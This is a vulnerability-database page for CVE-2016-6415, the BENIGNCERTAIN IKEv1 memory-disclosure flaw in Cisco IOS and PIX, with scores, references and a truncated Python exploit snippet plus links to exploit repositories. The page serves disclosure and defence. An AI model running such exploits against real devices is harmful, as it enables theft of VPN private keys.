Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.5
CVSSv3

CVE-2016-6415

Published: 19/09/2016 Updated: 03/06/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 506
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Subscribe to Ios

Vulnerability Summary

The server IKEv1 implementation in Cisco IOS 12.2 up to and including 12.4 and 15.0 up to and including 15.6, IOS XE up to and including 3.18S, IOS XR 4.3.x and 5.0.x up to and including 5.2.x, and PIX prior to 7.0 allows remote malicious users to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

cisco ios

cisco ios xe

cisco ios xr

Exploits

Exploit DB: Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
#!/usr/bin/python # -*- coding: utf8 -*- import socket from scapyall import * # --------------------------- # Requirements: # $ sudo pip install scapy # --------------------------- confverb = 0 RCVSIZE = 2548 TIMEOUT = 6 payload = '&gt;5\xc7\x07)\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02' payload += '\x00\x00\x00\x00\x00\x00\x0 ...

Github Repositories

https://github.com/dinosn/benigncertain

Simple exploit test for benigncertain (Equation Group's BENIGNCERTAIN tool - a remote exploit to extract Cisco VPN private keys)

benigncertain Simple exploit test for benigncertain (Equation Group's BENIGNCERTAIN tool - a remote exploit to extract Cisco VPN private keys) The port is based on the code from githubcom/ross-bradley/benign-certain The script is meant to be used as quick verification for the case other methods include metasploit's module and a more extensive version can be f

https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor

Re-implementation of VirtueSecurity's benigncertain-monitor

CVE-2016-6415-BenignCertain-Monitor Re-implementation of VirtueSecurity's benigncertain-monitor Doesn't have all the same payload options as the original, but replaces the bc-id binary with a better proof of concept by Ross Bradley that can be expanded on if necessary Credits: Original monitor written and maintained by VirtueSecurity at githubcom/VirtueSec

References

CWE-200http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1http://www.securityfocus.com/bid/93003http://www.securitytracker.com/id/1036841https://nvd.nist.govhttps://github.com/dinosn/benigncertainhttps://www.exploit-db.com/exploits/43383/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-3400CVE-2023-7252CVE-2024-21111denial of serviceCVE-2024-29661CVE-2024-22856remote attackersencryptionCVE-2023-38299
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook